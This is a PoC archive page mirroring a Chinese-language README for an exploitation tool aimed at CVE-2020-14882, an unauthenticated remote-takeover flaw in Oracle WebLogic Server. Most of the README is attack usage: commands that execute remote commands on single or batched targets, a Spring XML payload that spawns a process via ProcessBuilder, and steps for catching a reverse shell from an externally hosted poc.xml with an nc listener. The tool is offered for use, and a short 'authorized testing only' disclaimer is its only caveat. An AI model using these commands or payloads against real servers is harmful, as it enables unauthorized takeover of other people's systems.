Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2020-14882 PoC — Oracle WebLogic Server 安全漏洞

Source
https://github.com/GGyao/CVE-2020-14882_ALL
Associated Vulnerability
Title:Oracle WebLogic Server 安全漏洞 (CVE-2020-14882)
Description:Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
Description
CVE-2020-14882_ALL综合利用工具,支持命令回显检测、批量命令回显、外置xml无回显命令执行等功能。
Readme
# CVE-2020-14882_ALL

CVE-2020-14882_ALL综合利用工具,支持命令回显检测、批量命令回显、外置xml无回显命令执行等功能。

需要模块:requests、http.client

**(工具仅用于授权的安全测试,请勿用于非法使用,违规行为与作者无关。)**

命令回显模块已知成功版本:12.2.1.3.0、12.2.1.4.0、14.1.1.0.0

### 选项

![](./images/1.png)



### 功能一:命令回显

python3 CVE-2020-14882_ALL.py -u http://1.1.1.1:7001 -c "net user"

![](./images/2.png)

python3 CVE-2020-14882_ALL.py -u http://1.1.1.1:7001 -c "whoami"

![](./images/3.png)



### 功能二:批量命令回显

python3 CVE-2020-14882_ALL.py -f target.txt -c "whoami"

target.txt 格式:http://x.x.x.x:xx,一行一个。

![](./images/4.png)



### 功能三:外置xml文件无回显命令执行

1、Linux反弹shell为例,编辑好poc.xml文件,开启python监听。  

```
<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
      <list>
	<value>cmd</value>
      </list>
    </constructor-arg>
  </bean>
</beans>
```

开启python监听。

![](./images/5.png)

nc开启监听。

![](./images/6.png)

2、使用-x选项指定xml文件路径,发送payload。

python3 CVE-2020-14882_ALL.py -u http://xxxx:7001 -x http://xxx:8000/poc.xml

![](./images/7.png)

3、成功接收shell。

![](./images/8.png)
File Snapshot

 [4.0K]  /data/pocs/38462e23683ddfe252e5e08bd0d7de4018f09489
├── [8.5K]  CVE-2020-14882_ALL.py
├── [4.0K]  images
│   ├── [ 52K]  1.png
│   ├── [ 50K]  2.png
│   ├── [ 35K]  3.png
│   ├── [211K]  4.png
│   ├── [3.3K]  5.png
│   ├── [2.3K]  6.png
│   ├── [ 46K]  7.png
│   └── [ 71K]  8.png
├── [ 430]  poc.xml
├── [1.7K]  README.md
└── [  36]  target.txt

1 directory, 12 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →